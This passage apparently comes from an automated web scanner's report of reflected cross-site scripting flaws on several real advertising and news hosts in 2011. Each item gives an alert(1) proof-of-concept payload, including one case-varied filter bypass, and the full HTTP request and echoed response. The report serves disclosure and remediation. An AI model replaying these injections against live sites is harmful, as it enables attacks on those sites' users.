The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b887"-alert(1)-"3354bebcba6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai1b887"-alert(1)-"3354bebcba6/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:13 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai1b887"-alert(1)-"3354bebcba6/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

1.88. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc109"-alert(1)-"1c14d276541 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpdc109"-alert(1)-"1c14d276541?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:32 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpdc109"-alert(1)-"1c14d276541?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

1.89. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eee26"-alert(1)-"5f399683112 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /naieee26"-alert(1)-"5f399683112/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/naieee26"-alert(1)-"5f399683112/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

1.90. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9c4d"-alert(1)-"4b274db9fdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpd9c4d"-alert(1)-"4b274db9fdc?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpd9c4d"-alert(1)-"4b274db9fdc?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

1.91. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21e7f"-alert(1)-"ff89196e097 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai21e7f"-alert(1)-"ff89196e097/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai21e7f"-alert(1)-"ff89196e097/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

1.92. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a46a2"-alert(1)-"70ee2108da2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpa46a2"-alert(1)-"70ee2108da2?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:29 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpa46a2"-alert(1)-"70ee2108da2?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

1.93. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da81"-alert(1)-"46d128fdaa7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai3da81"-alert(1)-"46d128fdaa7/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai3da81"-alert(1)-"46d128fdaa7/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

1.94. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab625"-alert(1)-"aa949ccf2f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpab625"-alert(1)-"aa949ccf2f2?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:30 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpab625"-alert(1)-"aa949ccf2f2?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

1.95. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21de7"-alert(1)-"6a8ac96c613 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai21de7"-alert(1)-"6a8ac96c613/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E651C5B6E651A4418BD90FFF0000621; atdses=O

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai21de7"-alert(1)-"6a8ac96c613/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

1.96. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68e25"-alert(1)-"baa99d8e6dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php68e25"-alert(1)-"baa99d8e6dc?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E651C5B6E651A4418BD90FFF0000621; atdses=O

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:31 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php68e25"-alert(1)-"baa99d8e6dc?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

1.97. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 27cec<script>alert(1)</script>80cc05fcd82 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1315416403207-377852&mboxPC=1314743485378-299521.19&mboxPage=1315416403207-377852&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxCount=3&mbox=sidebar_global_phone27cec<script>alert(1)</script>80cc05fcd82&mboxId=0&mboxTime=1315398405840&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fprivacy%2F2o7&mboxReferrer=http%3A%2F%2Fallthingsd.com%2F20110906%2Fbring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves%2F%23&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/privacy/2o7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 142
Date: Wed, 07 Sep 2011 12:27:25 GMT
Server: Test & Target

mboxFactories.get('default').get('sidebar_global_phone27cec<script>alert(1)</script>80cc05fcd82',0).setOffer(new mboxOfferDefault()).loaded();

1.98. http://online.barrons.com/public/search/results.html [ARTICLESEARCHQUERY_PARSER parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.barrons.com
Path:   /public/search/results.html

Issue detail

The value of the ARTICLESEARCHQUERY_PARSER request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fa5e"><ScRiPt>alert(1)</ScRiPt>3426fe2fa5b was submitted in the ARTICLESEARCHQUERY_PARSER parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /public/search/results.html?KEYWORDS=%22MIRIAM%20GOTTFRIED%22&ARTICLESEARCHQUERY_PARSER=bylineOR4fa5e"><ScRiPt>alert(1)</ScRiPt>3426fe2fa5b HTTP/1.1
Host: online.barrons.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/article/SB50001424052702304605504576554641342164236.html?mod=BOL_hpp_highlight_top
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
